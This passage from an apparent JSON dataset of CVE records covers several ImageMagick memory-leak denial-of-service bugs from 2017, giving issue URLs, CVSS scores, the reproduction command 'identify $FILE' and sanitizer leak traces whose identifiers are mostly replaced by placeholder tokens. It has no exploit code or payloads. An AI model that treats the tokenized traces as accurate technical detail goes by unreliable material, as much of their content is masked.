NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG cb8 in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated 
from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG d0f in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14647. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14648. "severity": "MEDIUM",
  14649. "baseScore": 6.5,
  14650. "impactScore": 3.6,
  14651. "exploitabilityScore": 2.8
  14652. },
  14653. {
  14654. "CVE_ID": "CVE-2017-8348",
  14655. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/445",
  14656. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/445",
  14657. "Repo_new": "imagemagick/imagemagick",
  14658. "Issue_Created_At": "2017-04-26T16:43:24Z",
  14659. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fbc6f9c6b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a7e4c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fbc6acd5b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fbc6f9c6b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a7e4c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fbc6acd5b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fbc6f9c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ac in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a7e4c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG 
APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fbc6acd5b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fbc6f9c6b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a7e4c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fbc6acd5b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14660. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14661. "severity": "MEDIUM",
  14662. "baseScore": 6.5,
  14663. "impactScore": 3.6,
  14664. "exploitabilityScore": 2.8
  14665. },
  14666. {
  14667. "CVE_ID": "CVE-2017-8349",
  14668. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/443",
  14669. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/443",
  14670. "Repo_new": "imagemagick/imagemagick",
  14671. "Issue_Created_At": "2017-04-26T16:40:36Z",
  14672. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fd NUMBERTAG ca3eb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG ac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fd NUMBERTAG d4db NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14673. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14674. "severity": "MEDIUM",
  14675. "baseScore": 6.5,
  14676. "impactScore": 3.6,
  14677. "exploitabilityScore": 2.8
  14678. },
  14679. {
  14680. "CVE_ID": "CVE-2017-8350",
  14681. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/447",
  14682. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/447",
  14683. "Repo_new": "imagemagick/imagemagick",
  14684. "Issue_Created_At": "2017-04-26T16:45:21Z",
  14685. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG a in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG aa in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb 
NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG a2a in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG 
NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d4 in APITAG APITAG NUMBERTAG a6f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG f in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG 
NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e 
NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG ab8 in APITAG APITAG NUMBERTAG a6f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e 
NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG b7d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG 
e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG cb8 in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in 
NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG d0f in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14686. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14687. "severity": "MEDIUM",
  14688. "baseScore": 6.5,
  14689. "impactScore": 3.6,
  14690. "exploitabilityScore": 2.8
  14691. },
  14692. {
  14693. "CVE_ID": "CVE-2017-8351",
  14694. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/448",
  14695. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/448",
  14696. "Repo_new": "imagemagick/imagemagick",
  14697. "Issue_Created_At": "2017-04-26T16:46:15Z",
